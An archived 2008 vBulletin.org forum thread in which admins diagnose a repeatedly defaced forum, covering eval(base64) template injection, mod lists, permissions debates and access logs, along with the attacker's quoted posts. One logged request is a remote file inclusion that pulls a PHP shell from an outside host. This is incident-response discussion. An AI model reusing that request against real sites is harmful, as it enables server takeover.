vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   vbulletin hacked (https://vborg.vbsupport.ru/showthread.php?t=187974)

Bilderback 08-13-2008 01:41 AM

vbulletin hacked
 
I was recently called in to recover a friends vbulletin after it was hacked by ViRuS_HiMa,
a well known and fairly experienced hacker at turk-h.org
Since cpanel logging was not enabled, I do not know how he has entered the site but his technique was rewriting the spacer_open template in all styles with an eval(base64)
I would like very much to decode the eval(base64) so I can see if its simple html or if there is additional executions being made that I need to be aware of.
If anyone can assist with the decoding, please contact me.
Again, I do not know the point of entry (probably a Mod).

If anyone else has their forum hacked by ViRuS_HiMa, and it seems that no matter what you try,
it always shows the defacement, check your spacer_open templates in the database for eval(base64) encrypted text.

Thanks

Marco van Herwaarden 08-13-2008 07:02 AM

What is the URL to your friends board?

Bilderback 08-14-2008 03:27 PM

I sent it via pm since the site exploit has not yet been found.

Marco van Herwaarden 08-15-2008 06:20 AM

I don't see anything obvious at this time on the site.

This could have been done in many different ways: vulnerable modification, access to the database, etc..

fattony69 08-15-2008 08:12 PM

It happened again, the sites uses all non-beta mods, only two people have access to the database, and no mods that are known to be vulnerable. I believe it was the mysmiles mod, but I have no proof.

SEOvB 08-15-2008 08:38 PM

Make a database backup, clean everything off your server.

Reset everything up, run your database thru the impex to ensure no extra tables or permissions or anything have been added. and reupload vBulletin.

That will ensure no files have been left behind from the hacker

fattony69 08-15-2008 08:51 PM

Quote:

Originally Posted by FRDS (Post 1599532)
Make a database backup, clean everything off your server.

Reset everything up, run your database thru the impex to ensure no extra tables or permissions or anything have been added. and reupload vBulletin.

That will ensure no files have been left behind from the hacker

Last time, Bilderback removed it and we didn't have logs. This time we do. So I can see what it was. He changed the database and inserted something.

Bilderback 08-16-2008 01:09 AM

I'm still going through logs but all I can find right now is as follows:

Code:

82.201.250.97 - - [15/Aug/2008:14:28:23 -0600] "GET /clientscript/vbulletin_important.css?v=372 HTTP/1.1" 200 2077 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:21 -0600] "GET / HTTP/1.1" 200 16830 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:23 -0600] "GET /clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=372 HTTP/1.1" 200 31508 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:29 -0600] "GET /clientscript/yui/connection/connection-min.js?v=372 HTTP/1.1" 200 14756 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:30 -0600] "GET /clientscript/vbulletin_global.js?v=372 HTTP/1.1" 200 25464 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:32 -0600] "GET /clientscript/vbulletin_menu.js?v=372 HTTP/1.1" 200 9808 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:35 -0600] "GET /clientscript/overlib/overlib.js HTTP/1.1" 200 49636 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:46 -0600] "GET /clientscript/ncode_imageresizer.js?v=1.0.2 HTTP/1.1" 200 9585 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:47 -0600] "GET /morbid_orange/morbid_o/bgimg.gif HTTP/1.1" 200 1107 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:47 -0600] "GET /clientscript/vbulletin_md5.js?v=372 HTTP/1.1" 200 5871 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:47 -0600] "GET /morbid_orange/misc/navbits_start.gif HTTP/1.1" 200 1395 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:48 -0600] "GET /morbid_orange/misc/menu_open.gif HTTP/1.1" 200 668 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:48 -0600] "GET /morbid_orange/gradients/gradient_thead.gif HTTP/1.1" 200 492 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:48 -0600] "GET /morbid_orange/buttons/collapse_tcat.gif HTTP/1.1" 200 607 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:48 -0600] "GET /morbid_orange/gradients/gradient_tcat.gif HTTP/1.1" 200 789 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:48 -0600] "GET /morbid_orange/misc/poll_posticon.gif HTTP/1.1" 200 1418 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:48 -0600] "GET /images/icons/icon1.gif HTTP/1.1" 200 1423 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:48 -0600] "GET /morbid_orange/statusicon/forum_old.gif HTTP/1.1" 200 1875 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:49 -0600] "GET /morbid_orange/buttons/lastpost.gif HTTP/1.1" 200 1354 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:49 -0600] "GET /morbid_orange/statusicon/forum_link.gif HTTP/1.1" 200 1379 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:49 -0600] "GET /clientscript/vbulletin_read_marker.js?v=372 HTTP/1.1" 200 3813 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:50 -0600] "GET /morbid_orange/rating/rating_5.gif HTTP/1.1" 200 1670 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:50 -0600] "GET /images/statusicon/post_old.gif HTTP/1.1" 200 911 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:50 -0600] "GET /avatars/aka-beasttt.gif HTTP/1.1" 200 372 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:50 -0600] "GET /morbid_orange/buttons/collapse_thead.gif HTTP/1.1" 200 565 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:50 -0600] "GET /morbid_orange/misc/whos_online.gif HTTP/1.1" 200 1417 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:50 -0600] "GET /morbid_orange/misc/stats.gif HTTP/1.1" 200 1375 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:50 -0600] "GET /morbid_orange/statusicon/forum_new.gif HTTP/1.1" 200 2141 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:47 -0600] "GET /morbid_orange/morbid_o/logo.gif HTTP/1.1" 200 45734 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:28:57 -0600] "GET /favicon.ico HTTP/1.1" 200 10529 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:30:53 -0600] "GET / HTTP/1.1" 200 6661 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:30:57 -0600] "GET /rezora.jpg HTTP/1.1" 404 350 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:31:32 -0600] "GET / HTTP/1.1" 200 6661 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:31:33 -0600] "GET /rezora.jpg HTTP/1.1" 404 350 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:31:45 -0600] "GET /rezora.jpg HTTP/1.1" 404 349 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:31:53 -0600] "GET / HTTP/1.1" 200 6660 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:31:57 -0600] "GET /rezora.jpg HTTP/1.1" 404 350 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:32:29 -0600] "GET / HTTP/1.1" 200 6661 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:32:30 -0600] "GET /rezora.jpg HTTP/1.1" 404 350 "http://thebestforumever.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:36:38 -0600] "GET / HTTP/1.1" 200 6661 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:47:18 -0600] "GET / HTTP/1.1" 200 6744 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
82.201.250.97 - - [15/Aug/2008:14:56:03 -0600] "GET / HTTP/1.1" 200 6744 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"

The spacer_open always end with a </textarea> just after his eval code
I also found a vbulletin_textedit.js file within the Photoplog images directory.
Still looking into that one.

dtv100 08-16-2008 05:17 AM

can you list hack you have install please.

Bilderback 08-16-2008 01:53 PM

Auto Move Closed Threads 1.1.1
Automatically Added Friend 1.0.1
Casino .92
Cyb - Advanced Forum Statistics 5.8.1
Cyb - PayPal Donate 4.7
Friends "Facebook style" 1.0.0
Gifts System 0.6
GTPrivate Message Quickreply 3.7.0.1
GTUserCP - Enhanced USERCP Interface + USERCP Menu 3.7
gXboxLive 2.1.9
HS - Signature of the Week 1.0.0
ibProArcade for vBulletin 2.6.7
Inactive User Reminder Emails 1.1.3
Members who have Visited 3.7.003
Miserable Users 3.7.002 .
Mobile Device Detection 1.0.0
Multiple Login Detector 1.03
MySmilies VB 3.7.004
passiveVid 1.1.2
PhotoPlog Pro 2.1.4.8
Report Bad PM 1.0.5
Separate Sticky and Normal Threads 2.0.0
SocialForums 1.4.2
TCattd - The Image Resizer 1.2.6
Usergroup Color Bar 1.0.0
vBadvanced Links Directory 3.0 RC1
vBCredits 1.4
vBCredits with ibProArcade 1.2
vBSEO 3.2.0
vBSEO :: Sitemap Generator 2.2
Welcome Headers 5.0.2

dtv100 08-16-2008 05:40 PM

one of my forums was hacked not long ago and this hacks we both have.
dont know if this help us .

ibProArcade for vBulletin 2.6.7
Inactive User Reminder Emails 1.1.3
Miserable Users 3.7.002 .
vBSEO 3.2.0
vBSEO :: Sitemap Generator 2.2

PAKIDIL 08-16-2008 06:06 PM

Please check if you have set chmd to 777 or any of ur directory in the public_html.if you have then its easily can be hack like defacement by uploading somefile in php.after chaning the chmd check there must be some file with strange name delete it .

--------------- Added [DATE]1218913961[/DATE] at [TIME]1218913961[/TIME] ---------------

Quote:

Originally Posted by dtv100 (Post 1600174)
one of my forums was hacked not long ago and this hacks we both have.
dont know if this help us .

ibProArcade for vBulletin 2.6.7
Inactive User Reminder Emails 1.1.3
Miserable Users 3.7.002 .
vBSEO 3.2.0
vBSEO :: Sitemap Generator 2.2

ibProArcade for vBulletin 2.6.7 required chmd 777 on arcade soo its risky i guess

Bilderback 08-16-2008 08:45 PM

I did find the mysmiliesvb folder with 0777 permissions. The readme in the mod says it is required.
The user albums were moved into the file system and although the main folder is 0755,
every sub folder vbulletin creates is set to 0777
I found a 1x1 pixel image in the avatars folder but I cannot seem to locate it within file manager.

LT Mote 08-16-2008 11:45 PM

side note dude, my website & db was hacked a while back, maybe like year & 1/2 ago, I got in touch with my hosting company who checked the logs, and it ended up being FlashChat w/ vB intergration that they used to get in.... So if you are using systems outside vB that are intergrated into... Be advised of those as well, FlashChat is what got my site hacked.

PAKIDIL 08-17-2008 07:43 AM

All directories must be CHMOD 755 or higher security (meaning lower than 755, ex 750, 644, etc)

You cannot set CHMOD 777 on any files or directories because this makes the files world WRITABLE which is insecure

soo if any mod requires to set 0777 i recommend not to use it .have u lost any database of your site ?

fattony69 08-18-2008 03:06 PM

Happened again, this time different person.

Lynne 08-18-2008 03:08 PM

Have you followed all the steps outlined in this article?
How To Make My Forums More Secure

Digital Jedi 08-18-2008 03:15 PM

Quote:

Originally Posted by PAKIDIL (Post 1600557)
All directories must be CHMOD 755 or higher security (meaning lower than 755, ex 750, 644, etc)

You cannot set CHMOD 777 on any files or directories because this makes the files world WRITABLE which is insecure

soo if any mod requires to set 0777 i recommend not to use it .have u lost any database of your site ?

PAKIDIL, I recommend you read this before you continue to tell people not to install modifications with 777'd folders: Why chmod 777 is NOT a security risk

fattony69 08-18-2008 09:21 PM

Such a pain. Thankfully they only changed the index. I changed passwords and such. As for the list provided, I did most.

Bilderback 08-19-2008 01:08 AM

Thanks for all your suggestions- we're still looking for the exploit.
The latest hacker placed text within the inlinemodform just above the threadlist table.
http://thebestforumever.com/front-desk/
Has also been doing index page defacing.
I suppose we'll simply have to back track and begin disabling plugins until it can be located.

dtv100 08-19-2008 01:22 AM

maybe problem was this http://www.vbulletin.com/forum/showthread.php?t=282133

ssslippy 08-19-2008 02:30 AM

You wouldn't happen to have HTML enabled anywhere?

fattony69 08-19-2008 02:32 AM

Quote:

Originally Posted by dtv100 (Post 1601975)

I got hacked an hour after I installed it. :erm:

Quote:

Originally Posted by ssslippy (Post 1602005)
You wouldn't happen to have HTML enabled anywhere?

Of course not. I know that is a no no.:o

Bilderback 08-19-2008 02:37 AM

I did find this in log.. anyone?
GET /index.php?vb=include('http://meto5757.by.ru/shells/r57.txt');

Upon further research, they tried multiple file exploits finally ending in the faq.php
which got a c100.php file uploaded to root

I didnt post the shell I found but I sent it to Marco via PM

PAKIDIL 08-19-2008 10:13 AM

Quote:

Originally Posted by Digital Jedi (Post 1601509)
PAKIDIL, I recommend you read this before you continue to tell people not to install modifications with 777'd folders: Why chmod 777 is NOT a security risk

i am just sharing my experience and telling people could be this may be the issue .my forum hacked and i know how they hacked thtz why i am sharing .now i am still runing forum widout allowing attachment ,no folder is on chmd 777 and plus the post u quote is not mine i just copy paste from big company hostgator. they are best in forum running web hosting.they have lots of vbulletin forum running on their server and always solve this kind of issue's to their client and the link you posted is from simplemachines and we are using vbulletin soo may be its not problem with them.

engedi05 08-20-2008 05:06 PM

My Forum got hacked as well.. by virusman... my forum url: http://www.hyipsensor.net/board

Please check whether it is the same problem as stated in this thread..

Bilderback 08-20-2008 09:47 PM

Yes, same problem
It appears that there is a backdoor on the bluehost server.
I have seen many queries to search engines for that specific shared ip address.
Its either in your spacer_open templates or your index.php was rewritten.
Also look for a c100.php file in your forum root.
You can contact me if you need assistance.

EDIT: I just checked other files in your board and it appears that the template hack was executed.
Look for some weird code in your spacer_open(s)

Digital Jedi 08-21-2008 05:09 AM

Quote:

Originally Posted by PAKIDIL (Post 1602203)
i am just sharing my experience and telling people could be this may be the issue .my forum hacked and i know how they hacked thtz why i am sharing .now i am still runing forum widout allowing attachment ,no folder is on chmd 777 and plus the post u quote is not mine i just copy paste from big company hostgator. they are best in forum running web hosting.they have lots of vbulletin forum running on their server and always solve this kind of issue's to their client and the link you posted is from simplemachines and we are using vbulletin soo may be its not problem with them.

My point is, if they've hacked into your server, your file permissions aren't going to matter. They will have access to everything anyway.

stryderunknown 08-21-2008 07:32 PM

From what I remember when I use to follow some exploits that occurred on a notorious site for logging site defacements. Usually groups don't just hack the individual website but actually obtain rights over entire servers (This was because there was a score system for how many defacements the groups obtained). They would exploit code that Host provider have installed on their systems and doesn't effect just one website but potentially their whole clientèle base.

If you can't find fault in your software or mods (If it's server side then they would rewrite the indexes as a BATCH), I would seriously suggest informing your Host or enquiring at the very least if they are having problems.

Quarterbore 08-21-2008 08:20 PM

Seeing a trend here, I got hit last night and mine was a bit different as they seemed to get FTP access and they ran a script that started adding porn links in all the files on the server. I have full off-server backups but it still took about 4-5 hours to delete everything off there and go to a backup.

My issue may be unrelated or it may be related...

I do know it was a bot that hit my site as they changed hundreds of files in about 20-minutes. I have copies of the code they inserted as well (darned porn links).

PAKIDIL 08-21-2008 08:31 PM

Quote:

Originally Posted by Digital Jedi (Post 1603537)
My point is, if they've hacked into your server, your file permissions aren't going to matter. They will have access to everything anyway.

YEAH YOU are rite if they hack in to the server then this permission are not going to matter.ofcourse they will hack it again .it will be like a theif has entered in the house and after that you are locking the door. must search for the good hosting company.

Quarterbore 08-25-2008 12:39 PM

It took some time but I figured out my hacker came from IP: 84.121.141.217

IP owner info (Whois)
Quote:

OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL

ReferralServer: whois://whois.ripe.net:43

NetRange: 84.0.0.0 - 84.255.255.255
CIDR: 84.0.0.0/8
NetName: 84-RIPE
NetHandle: NET-84-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: SUNIC.SUNET.SE
NameServer: TINNIE.ARIN.NET
NameServer: NS3.NIC.FR
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at Query the RIPE Database
RegDate: 2003-11-17
Updated: 2004-03-16

# ARIN WHOIS database, last updated 2008-08-23 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.



Deferred to specific whois server: whois.ripe.net...


% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See Whois Database Copyright
Quote:

Whois record :

[Querying whois-ita.nominalia.com]
[whois-ita.nominalia.com]

NOMINALIA INTERNET S.L. - Whois Server Version 1.4

The Registry database contains ONLY .COM, .NET and .ORG domains.

Domain name: ONO.COM
Created on: 2003-07-28
Updated on: 2008-01-17
Expires on: 2008-12-14
Registrant Name: CABLEUROPA SA
Contact: Cableuropa SA
Registrant Address: C\ Basauri, 7
Registrant City: Aravaca
Registrant Postal Code: E-28023
Registrant Country: ES
Administrative Contact Organization: Cableuropa S.A
Administrative Contact Name: Nicolas Chapa
Administrative Contact Address: Basauri 7-9 Urbanizacion La Florida
Administrative Contact City: Aravaca
Administrative Contact Postal Code: 28023
Administrative Contact Country: ES
Administrative Contact Email: dominios@ono.es
Administrative Contact Tel: +34 911809300
Administrative Contact Fax: +34 911809600
Technical Contact Organization: Cableuropa S.A
Technical Contact Name: Gerente de Servicios de Internet
Technical Contact Address: Basauri 7,9-Urbanizacion La Florida
Technical Contact City: Aravaca
Technical Contact Postal Code: 28023
Technical Contact Country: ES
Technical Contact Email: dominios@ono.es
Technical Contact Phone: +34 911809300
Technical Contact Fax: +34 911809600
Primary Name Server Hostname: DNS01.ONO.COM
Secondary Name Server Hostname: DNS03.ONO.COM


>>> Last update of whois database: Sun Aug 24 12:48:31 2008 <<<
Related IPs:
I locked out the hacker's IP and all related IPs. Perhaps this will help someone else

Videx 08-25-2008 11:44 PM

Thanks. 84.0.0.0-84.255.255.255 added to my cpanel ip deny manager. I don't expect any legit visitors from NL, so I can get away with that!

Marco van Herwaarden 08-26-2008 08:15 AM

Your "hacker" has used an IP address that is asigned to a Spanish ISP. So he is just 1 of the customers of this ISP. He is not located in the Netherlands.

PS RIPE is the european registrar and it's headquarters are located in the Netherlands, this has got nothing to do with your hacker.

Videx 08-26-2008 11:48 AM

Thanks for the clarification. I'm not expecting anyone legit from Spain either, so I'm still safe denying the whole range.

bebeko 09-10-2008 12:40 PM

Any updates on this vulnerability? I had a site hacked twice exactly the same way (base64 encrypted php code was inserted at table 'template' , field 'template' , key record 'spacer_open', which was evaluated and defaced the website). My vBulletin version is 3.7.3 PL1. Modules used (all latest available version):
  • MorbiD SuitE [9 Flavours] | LYCHEE new| 3.7.2
  • Cyb - Advanced Permissions Based on Post Count
  • Automatic Thread Tagger
  • Periodic Prune Pms [ Cron Job - Fully Controlable ]
  • Separate Sticky and Normal Threads
  • Embed XHTML valid YouTube and Google Video into your posts
  • Automatic Inactive Users Pruning - vB3.7 RC2
  • vbAnonymizer
  • GTCustom Pages - Create Custom Pages With Ease
  • Send emails with HTML as HTML

bebeko 09-16-2008 04:14 PM

It seems that the only module installed alike with bilderback's configuration is "Separate Sticky and Normal Threads".
I still haven't found how attackers managed to rewrite the spacer_open template in all styles with an eval(base64) function...
Anyone with the same problem?

Bilderback 09-18-2008 11:15 PM

In our case, there was a php shell script already planted somewhere on the BlueHost shared server.
Amazingly and rare, the hacker actually communicated in the forum for some time.
http://thebestforumever.com/archives...c-ur-site.html

RS25com 09-25-2008 07:06 PM

Quote:

Originally Posted by Bilderback (Post 1625257)
In our case, there was a php shell script already planted somewhere on the BlueHost shared server.
Amazingly and rare, the hacker actually communicated in the forum for some time.
http://thebestforumever.com/archives...c-ur-site.html

I'd be interested in seeing what he said, but without registering. Care to post his comments?

fattony69 09-25-2008 08:07 PM

Quote:

Originally Posted by RS25com (Post 1630299)
I'd be interested in seeing what he said, but without registering. Care to post his comments?

I have some quotes if you want them:

Quote:

hi tbfe admins and users . .

i think u know me ?

any way i ViRuS_HiMa , the person who hacked ur site 3 times be4

fisrt sorry me about my english cuz i 17 y old from egypt http://thebestforumever.com/images/smilies/smile.gif

when i read the topic , its talk about this site hacked more than 4 or 5 times i think !!

how did i hack u ?

i was have phpshell script on the server that ur site has hosted on . .

but i was user and it mean that i can only read files from other sites on the server

so i look for forums to read the config thin use an script to change all forum home pages . .

and i think some one tlak about me and about the scrept in the vBulletin site :

vbulletin hacked - vBulletin.org Forum

but u know they was wrong in more of things cuz they talk about 777 permissions

but i dont need to 777 permissions to hack the vb forums cuz i can hack it with the only config data . . .

how to protect ur selfs from the next attacks ?

u have to change the include directory place

if u dont know what include dirctory

its folder in the vBulletin script . . .

and u have also to crypt the config by zend program . . .

last advic to u that u have to change ur passwords cum my some one have it now

and u have to see wich users are administrator and can log to the vb cpanel

cus the hacker can creat new user have the administrators access to the vb cpanel

now i tell u some of the forums security ways and u should know more

but any way if u dont know more about forums and sites security

u can contact me and i gonna help u as i can

A.e@hotmail.com


that was my advvices and i w8 for u . . .

and for the second time sorry me about my english . .

ViRuS_HiMa
Quote:

look when i deface ur forum i wasnt have phpshell on the "tbfe" i was have the shell on another site of the server

so when my id on the sell is user , and i wanna hack another site on the server ,

i have to use the script that i talkin about . .

i have use 2 scripts , one to read the config of the forum and the other is to deface all forum home pages .

about the milw0rm script , there is big defranse between my scriptes and the milw0rm script . .

the job of milw0rm script is to send the new exploits by the useres to stroky the milw0rm admin

then he add it to the script , so any 1 can see it . use it , and hack by it . . .

ViRuS_HiMa . .


All times are GMT. The time now is 05:49 PM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01405 seconds
  • Memory Usage 1,910KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_code_printable
  • (15)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (40)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 

Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete